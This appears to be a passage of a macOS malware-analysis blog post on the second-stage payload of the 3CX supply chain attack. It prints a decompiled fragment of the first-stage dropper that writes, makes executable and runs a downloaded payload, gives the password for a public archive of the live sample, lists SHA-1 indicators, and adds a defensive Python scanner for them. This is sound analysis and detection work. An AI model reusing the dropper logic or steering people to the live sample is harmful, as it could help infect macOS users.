Ironing out (the macOS) details of a Smooth Operator (Part II)
As “Sharing is Caring” I’ve uploaded the malicious binary UpdateAgent to our public macOS malware collection. The password is: infect3d
Earlier this week, I published a blog post that added a missing puzzle piece to the 3CX supply chain attack (attributed to the North Koreans, aka Lazarus Group).

In that post, we uncovered the trojanization component of the macOS variant of the attack, comprehensively analyzed it, and provided IoCs for detection. I’d recommend reading that write-up, as this post, part II, continues from where that left off.

We ended the previous post by noting that the main goal of the 1st-stage payload (libffmpeg.dylib) was to download and execute a 2nd-stage payload named UpdateAgent. The following snippet of annotated decompiled code, from the 1st-stage payload, shows this logic:

```c
//write out 2nd-stage payload "UpdateAgent"
// which was just downloaded from the attacker's server
stream = fopen(path2UpdateAgent, "wb");
fwrite(bytes, length, 0x1, stream);
fflush(stream);
fclose(stream);

//make +x
chmod(path2UpdateAgent, 755);

//execute
…
```
IoC
55554944839216049d683075bc3f5a8628778bb8
55554944ee2cb96a1f5132ce8788c3fe0dfe7392
9e9a5f8d86356796162cee881c843cde9eaedfb3
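As an added example (not code from the original post or from the 3CX/Objective-See tooling), the following Python script turns the IoCs above into a simple on-host check: it walks a directory tree, streams every regular file through SHA-1, and reports files whose digest matches the list or whose name is UpdateAgent, the file the 1st-stage payload writes out and executes. It assumes the IoC values are SHA-1 digests (they are 40 hex characters, which matches SHA-1), and the sample tree it scans is constructed in a temporary directory for the demo; the file named UpdateAgent there is a harmless placeholder, not the real payload.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Hashes from the IoC section of this post. Assumption: they are SHA-1
# digests (40 hex characters), which is how the list is read here.
IOC_SHA1 = {
    "55554944839216049d683075bc3f5a8628778bb8",
    "55554944ee2cb96a1f5132ce8788c3fe0dfe7392",
    "9e9a5f8d86356796162cee881c843cde9eaedfb3",
}

# File name of the 2nd-stage payload that libffmpeg.dylib writes out.
IOC_NAMES = {"UpdateAgent"}


def sha1_hex(data: bytes) -> str:
    """SHA-1 of an in-memory byte string, as lowercase hex."""
    return hashlib.sha1(data).hexdigest()


def sha1_of_file(path, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-1 so large binaries need not fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root) -> list:
    """Walk `root` and return (path, [reasons]) for every file matching an IoC.

    A hit is recorded for a matching file name and/or a matching SHA-1; both
    reasons are reported when both apply. Symlinks are skipped so a link
    pointing outside the tree cannot make the scan wander.
    """
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue
            reasons = []
            if name in IOC_NAMES:
                reasons.append("name:" + name)
            try:
                digest = sha1_of_file(p)
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
            if digest in IOC_SHA1:
                reasons.append("sha1:" + digest)
            if reasons:
                hits.append((str(p), reasons))
    return hits


def build_sample_tree(root) -> None:
    """Constructed sample data (not real malware): a harmless placeholder
    carrying the dropped payload's name, next to an unrelated text file."""
    root = Path(root)
    (root / "UpdateAgent").write_bytes(b"#!/bin/sh\necho placeholder\n")
    (root / "notes.txt").write_bytes(b"nothing to see here\n")


def run_demo() -> list:
    """Build the constructed tree in a temp dir, scan it, return (name, reasons) hits."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sorted((Path(p).name, reasons) for p, reasons in scan_tree(tmp))


if __name__ == "__main__":
    for name, reasons in run_demo():
        print(name, reasons)
```

In the constructed demo only the name rule fires, since the placeholder's digest is not on the list; on a real host, point scan_tree at the directory you want to sweep and treat a sha1 hit as a confirmed match and a name-only hit as something to triage (the name alone is a weak indicator). The name check runs before hashing so the reason list stays ordered even when both rules match.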